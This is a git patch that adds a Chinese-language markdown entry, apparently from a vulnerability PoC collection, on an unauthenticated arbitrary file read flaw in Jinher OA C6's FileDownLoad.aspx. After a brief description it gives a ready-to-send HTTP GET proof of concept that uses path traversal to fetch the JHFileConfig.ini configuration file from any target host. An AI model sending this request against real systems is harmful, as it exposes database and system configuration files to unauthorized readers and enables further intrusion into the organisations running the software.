From 1b8e5798351c428274fbc8bf0c3149abcb594f41 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Thu, 9 May 2024 12:36:29 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E9=87=91=E5=92=8COAC6-FileDownLoad.as?= =?UTF-8?q?px=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=E8=AF=BB=E5=8F=96?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 金和OAC6-FileDownLoad.aspx任意文件读取漏洞.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 金和OAC6-FileDownLoad.aspx任意文件读取漏洞.md diff --git a/金和OAC6-FileDownLoad.aspx任意文件读取漏洞.md b/金和OAC6-FileDownLoad.aspx任意文件读取漏洞.md new file mode 100644 index 0000000..b7b060f --- /dev/null +++ b/金和OAC6-FileDownLoad.aspx任意文件读取漏洞.md @@ -0,0 +1,17 @@ +## 金和OAC6-FileDownLoad.aspx任意文件读取漏洞 + +金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。 +金和OA C6 FileDownLoad.aspx接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 + +## poc +``` +GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1 +Host: {{Hostname}} +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Cache-Control: max-age=0 +Connection: close +Upgrade-Insecure-Requests: 1 +```